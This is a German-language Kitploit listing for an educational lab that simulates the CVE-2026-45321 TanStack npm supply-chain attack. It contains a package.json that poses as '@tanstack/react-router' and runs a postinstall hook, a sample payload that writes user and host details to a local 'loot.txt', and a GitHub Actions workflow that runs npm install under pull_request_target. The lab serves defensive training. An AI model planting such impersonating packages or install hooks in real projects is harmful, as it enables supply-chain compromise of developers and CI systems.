Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-45321-Tanstack — Bildungslabor, das npm-Supply-Chain-Angriffe, CI/CD-Missbrauch und install-time Codeausführung über CVE-2026-45321 simuliert. Praxisorientiertes defensives Sicherheitstraining mit lokaler Bereitstellung bösartiger Pakete. | Kitploit
Tools/GitHubGitHub/7whyex/cve-2026-45321-tanstack
SchwachstellenanalyseMalware-AnalyseLieferkettensicherheitLernen & BildungLabs & Praxis
GitHub7whyex/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

Bildungslabor, das npm-Supply-Chain-Angriffe, CI/CD-Missbrauch und install-time Codeausführung über CVE-2026-45321 simuliert. Praxisorientiertes defensives Sicherheitstraining mit lokaler Bereitstellung bösartiger Pakete.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 MonatNoch nicht geprüft

Simulation eines Supply-Chain-Angriffs – CVE-2026-45321 (TanStack)

Bildungs-Labor zum Verständnis von npm-Supply-Chain-Angriffen, CI/CD-Missbrauch und Installationszeit-Codeausführung

Haftungsausschluss

Dieses Projekt wurde nur erstellt für:

  • Cybersicherheitsausbildung,
  • defensive Sicherheitsforschung,
  • lokale Laborsimulation,
  • Verständnis des Konzepts von Supply-Chain-Angriffen.

Verwenden Sie dieses Projekt nicht für:

  • Angriff auf reale Systeme,
  • Diebstahl von Anmeldeinformationen,
  • Bereitstellung von Malware,
  • unbefugter Zugriff,
  • oder andere illegale Aktivitäten.

Beschreibung

Dieses Labor simuliert die grundlegenden Konzepte der Vorfälle:

  • CVE-2026-45321
  • TanStack npm Supply-Chain-Kompromittierung
  • GitHub Actions CI/CD-Missbrauch
  • npm Lifecycle-Skriptausführung

Die Simulation erfolgt lokal und sicher ohne:

  • echten Credential-Diebstahl,
  • Token-Exfiltration,
  • oder Kompromittierung von Drittanbieterdiensten.

Laborstruktur

root@kitploit:~
lab/
├── fake-repo/          # Simulasi repository target
├── attacker-package/   # Simulasi package malicious
└── victim-project/     # Simulasi korban

Funktionsweise der Simulation

root@kitploit:~
Attacker Package
        ↓
npm install
        ↓
postinstall script berjalan
        ↓
payload.js dieksekusi otomatis
        ↓
Korban terkena install-time execution

Gelernte Konzepte

  • npm Lifecycle-Hooks
  • Installationszeit-beliebige Codeausführung
  • Supply-Chain-Angriff
  • CI/CD-Vertrauensgrenze
  • bösartiges npm-Paket
  • Postinstall-Missbrauch
  • Abhängigkeitskompromittierung

Installation

1. Repository klonen

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

Einrichtung des Angreiferpakets

2. In den Ordner des Angreiferpakets wechseln

root@kitploit:~
cd attacker-package

3. Abhängigkeit installieren

root@kitploit:~
npm install

4. Tarball-Paket erstellen

root@kitploit:~
npm pack

Ergebnis:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

Opfersimulation

5. In das Opferprojekt wechseln

root@kitploit:~
cd ../victim-project

6. Bösartiges Paket installieren

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

Ausgabe

Bei Erfolg erscheint:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

und die Datei:

root@kitploit:~
loot.txt

wird automatisch erstellt.


Beispiel payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

Beispiel package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

CI/CD-Simulation

Dieses Projekt kann auch verwendet werden, um zu verstehen:

  • GitHub Actions
  • pull_request_target
  • CI/CD-Berechtigungsgrenze
  • Abhängigkeitsausführung

Beispiel-Workflow:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

Beziehung zu CVE-2026-45321

Lab-SimulationEchte Welt
attacker-packagekompromittiertes TanStack-Paket
payload.jsbösartiger Installer

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

Nur zu Bildungszwecken

Dieses Labor wurde erstellt, um das Bewusstsein zu schärfen für:

  • Supply-Chain-Sicherheit,
  • Abhängigkeitssicherheit,
  • CI/CD-Sicherheit,
  • und defensive Sicherheitsforschung.
Tool herunterladen
postinstall
Lifecycle-Hook-Missbrauch
victim-projectEntwickler/CI-Opfer
fake-repoGitHub Actions-Pipeline